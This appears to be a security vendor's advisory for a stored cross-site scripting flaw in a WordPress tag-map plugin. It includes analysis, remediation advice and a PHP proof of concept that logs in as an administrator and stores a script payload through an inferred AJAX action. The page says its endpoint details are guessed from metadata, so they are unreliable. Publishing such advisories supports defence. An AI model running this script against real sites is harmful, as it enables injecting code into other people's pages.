Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-14057: Multi-column Tag Map <= 17.0.39 – Authenticated (Administrator+) Stored Cross-Site Scripting via 'mctm_css_conditional' Parameter (multi-column-tag-map)

Severity Medium (CVSS 4.4)
CWE 79
Vulnerable Version 17.0.39
Patched Version
Disclosed January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14057 (metadata-based):
This vulnerability is an authenticated Stored Cross-Site Scripting (XSS) flaw in the Multi-column Tag Map WordPress plugin. The vulnerability exists in the plugin’s admin settings, specifically affecting the ‘mctm_css_conditional’ parameter. Attackers with administrator-level permissions can inject malicious scripts that persist and execute when affected pages are loaded. The CVSS score of 4.4 reflects a medium severity, with the attack complexity heightened by the requirement for administrator access and specific WordPress configuration (multisite or disabled unfiltered_html).

Atomic Edge research infers the root cause is insufficient input sanitization and output escaping, as indicated by the CWE-79 classification and the vulnerability description. The plugin likely accepts user-supplied input from an administrator-facing form field named ‘mctm_css_conditional’ and stores it without proper sanitization. The stored value is later rendered on a public-facing page without adequate output escaping. This conclusion is inferred from the CWE and description, as the source code is unavailable for confirmation.

Exploitation requires an attacker to have an administrator account on the target WordPress site. The attack vector is a POST request to a plugin-specific admin settings page or AJAX handler. The attacker would submit a crafted payload containing JavaScript within the ‘mctm_css_conditional’ parameter. A realistic payload could be alert(document.domain) or a more malicious script designed to steal session cookies. The exact endpoint is not specified, but WordPress plugin patterns suggest it is likely an AJAX action (e.g., wp_ajax_mctm_save_settings) or a form submission to /wp-admin/admin.php?page=multi-column-tag-map.

Effective remediation requires implementing proper input validation and output escaping. The plugin should sanitize the ‘mctm_css_conditional’ parameter on input using functions like sanitize_text_field() or wp_kses(). On output, the plugin must escape the stored value using esc_attr() or esc_html() depending on the context. WordPress core functions like wp_unslash() may also be necessary to handle slashed data. A patch would involve adding these security functions around the vulnerable parameter handling code.

Successful exploitation leads to stored XSS, allowing an attacker with administrator privileges to execute arbitrary JavaScript in the context of any user viewing the compromised page. This can result in session hijacking, site defacement, or redirection to malicious sites. The impact is limited to confidentiality and integrity (C:L/I:L) because the attack requires a high-privilege account and specific WordPress configurations, preventing widespread compromise. However, it can facilitate privilege persistence or lateral movement within a compromised admin account.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-14057 - Multi-column Tag Map <= 17.0.39 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'mctm_css_conditional' Parameter
<?php
/**
 * Proof of Concept for CVE-2025-14057.
 * ASSUMPTIONS: Target is a WordPress site with the vulnerable plugin.
 *              Attacker has valid administrator credentials.
 *              The plugin's settings save endpoint is a standard WordPress AJAX handler.
 *              The vulnerable parameter is 'mctm_css_conditional'.
 */

$target_url = 'https://example.com'; // CHANGE THIS
$username = 'admin'; // CHANGE THIS
$password = 'password'; // CHANGE THIS

// Payload to inject. This is a simple alert for demonstration.
$malicious_payload = '<script>alert("Atomic Edge XSS Test: "+document.domain);</script>';

// Step 1: Authenticate with WordPress to obtain a valid session cookie.
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save cookies
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Send the exploit payload to the plugin's settings update endpoint.
// The exact AJAX action is inferred from the plugin slug. Common pattern is 'mctm_save_settings'.
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$exploit_data = array(
    'action' => 'mctm_save_settings', // Inferred AJAX action
    'mctm_css_conditional' => $malicious_payload, // Vulnerable parameter
    // A nonce may be required. This PoC assumes the vulnerability includes a missing nonce check.
    // If a nonce is needed, it must be extracted from the admin page first.
);

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $exploit_data);
$ajax_response = curl_exec($ch);
curl_close($ch);

// Step 3: Check response.
echo "Login and exploit attempt completed.n";
echo "If successful, the payload $malicious_payload is now stored.n";
echo "Visit any page that uses the Multi-column Tag Map plugin to trigger the script.n";
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School